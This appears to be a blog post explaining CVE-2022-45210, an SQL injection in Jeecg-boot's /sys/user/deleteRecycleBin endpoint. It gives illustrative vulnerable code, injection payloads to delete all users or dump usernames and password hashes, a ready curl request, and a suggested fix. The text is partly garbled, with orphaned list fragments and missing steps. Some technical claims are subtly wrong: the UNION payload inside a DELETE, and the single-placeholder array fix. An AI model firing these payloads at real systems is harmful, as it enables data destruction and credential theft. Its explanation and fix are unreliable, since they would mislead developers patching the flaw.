Jeecg-boot is a popular low-code platform used by many businesses for rapid development. In late 2022, a significant vulnerability was discovered affecting version 3.4.3 and possibly earlier versions. This post walks you through the CVE-2022-45210 SQL injection vulnerability found in the /sys/user/deleteRecycleBin component, explains how it can be exploited, shows code snippets, and offers resources for further reading.
What is CVE-2022-45210?
CVE-2022-45210 is a SQL injection vulnerability that could let an attacker execute arbitrary SQL commands on the Jeecg-boot database by manipulating input parameters sent to a specific endpoint.
Vulnerable Version: Jeecg-boot v3.4.3
Affected Path: /sys/user/deleteRecycleBin
Execute further attacks using the compromised data
This vulnerability could result in full loss of confidentiality, integrity, and availability of your Jeecg-boot application.
Where is the Issue?
The vulnerability exists in the deleteRecycleBin function in the Jeecg-boot user management system. It does not properly validate or sanitize user input before using it in an SQL query.
Here’s a simplified version of the vulnerable Java Spring code
// Inside SysUserController.java
@PostMapping("/deleteRecycleBin")
public Result<?> deleteRecycleBin(@RequestBody String ids) {
// ids comes directly from the HTTP request body and is not sanitized
String sql = "DELETE FROM sys_user WHERE id in (" + ids + ")";
jdbcTemplate.execute(sql); // Direct SQL execution
return Result.OK();
}
Problem: The ids parameter is directly used in an SQL statement without validation or parameterization.
Normally, this endpoint is meant to delete users by ids
POST /sys/user/deleteRecycleBin
Content-Type: application/json
["1","2","3"]
Step 2: Craft a Malicious Request
Suppose you want to dump the list of all users (for demonstration). You can manipulate the ids input to inject your own SQL.
Example of a malicious payload
POST /sys/user/deleteRecycleBin
Content-Type: application/json
["1) OR 1=1--"]
Resulting SQL
DELETE FROM sys_user WHERE id in (1) OR 1=1--);
This query can delete all users in the table, not just the intended ones.
Or Extract Data (using UNION)
["1) UNION SELECT GROUP_CONCAT(username, ':', password) FROM sys_user--"]
*This can leak usernames and hashed passwords to the application log, error messages, or response if the output is not tightly controlled.*
Prepare a Burp Suite, Postman, or curl command
2. Send payloads as shown above to /sys/user/deleteRecycleBin
3. Observe the results: Do you get errors? Are records mass deleted? Is sensitive data returned or leaked?
curl -k -X POST https://targetsite.com/sys/user/deleteRecycleBin \
-H 'Content-Type: application/json' \
--data-binary '["1) OR 1=1--"]'
---
- Refactor the code to use parameterized/prepared statements
String sql = "DELETE FROM sys_user WHERE id in (?)";
jdbcTemplate.update(sql, idsArray); // Pass as a parameter, not hand-built SQL
References
- CVE-2022-45210 on NVD
- Project GitHub: Jeecg-boot
- OWASP SQL Injection Cheat Sheet
Conclusion
CVE-2022-45210 represents a critical oversight in user input handling in Jeecg-boot v3.4.3. SQL injection can be devastating, but it’s easy to prevent with proper input validation and safe coding practices.
If you use Jeecg-boot, upgrade right away and audit your application for similar vulnerabilities. Never trust the client — always sanitize and parameterize your queries.
Stay safe and secure your apps!
*If you have any questions or need remediation help, feel free to reach out or ask in the Jeecg-boot GitHub Issues.*
Disclaimer: This content is for educational purposes only. Do not use on systems you don't own or have permission to test.
Timeline
Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:41:00 UTC